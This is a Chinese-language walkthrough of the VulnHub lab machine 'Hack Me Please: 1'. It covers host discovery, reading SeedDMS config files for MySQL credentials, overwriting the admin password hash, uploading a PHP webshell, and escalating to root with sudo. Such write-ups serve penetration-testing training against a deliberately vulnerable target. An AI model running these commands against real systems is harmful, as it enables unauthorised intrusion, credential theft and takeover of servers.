OSCP难度靶机之Hack Me Please: 1

admin 2022年11月16日11:37:10评论28 views字数 1007阅读3分21秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/hack-me-please-1,731/
虚拟机简介:一个完全为OSCP制作的简单盒子
目标:1个flag
级别:初级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Hack Me Please: 1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.145

查看开放22、80、8585端口

OSCP难度靶机之Hack Me Please: 1

2、渗透测试

2.1 WEB渗透

1.爆破信息泄露

访问站点首页未发现有用信息

OSCP难度靶机之Hack Me Please: 1

通过JS页面中提示访问隐藏页面

OSCP难度靶机之Hack Me Please: 1

搜索CMS相关漏洞,由于使用的版本为5.1.22不存在漏洞

searchsploit seeddms

OSCP难度靶机之Hack Me Please: 1

2.查看CMS源代码

根据代码提示存在setting.xml文件

https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/conf/.htaccess#l1

OSCP难度靶机之Hack Me Please: 1

在配置文件中获取到mysql的账号和密码

http://192.168.207.145/seeddms51x/conf/settings.xml

OSCP难度靶机之Hack Me Please: 1

3.连接MySQL收集

mysql -h 192.168.207.145 -u seeddms -pseeddms

OSCP难度靶机之Hack Me Please: 1

查看本地数据账号和密码信息

use seeddms;
select * from tblUsers;

OSCP难度靶机之Hack Me Please: 1

在用户表中获取到另外一个账号和密码

select * from users;

OSCP难度靶机之Hack Me Please: 1

更新当前admin账号的密码为admin

UPDATE tblUsers SET pwd='21232f297a57a5a743894a0e4a801fc3' WHERE login='admin';

OSCP难度靶机之Hack Me Please: 1

4.上传webshell

使用更新后的账号和密码进行登录

OSCP难度靶机之Hack Me Please: 1

在添加文档中上传webshell

OSCP难度靶机之Hack Me Please: 1

上传完毕后查看文件的ID值

OSCP难度靶机之Hack Me Please: 1

按照如下路径进行访问

http://192.168.207.145/seeddms51x/data/1048576/6/1.php

OSCP难度靶机之Hack Me Please: 1

2.2 主机渗透

1.查看当前用户

cat /etc/passwd | grep /bin/bash

OSCP难度靶机之Hack Me Please: 1

使用数据库中获取到的账号和密码进行登录

su - saket
python3 -c 'import pty;pty.spawn("/bin/bash")'

OSCP难度靶机之Hack Me Please: 1

2.获取root权限

sudo -l

OSCP难度靶机之Hack Me Please: 1

获取root权限

sudo su

OSCP难度靶机之Hack Me Please: 1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Hack Me Please: 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月16日11:37:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Hack Me Please: 1https://cn-sec.com/archives/1412594.html

发表评论

匿名网友 填写信息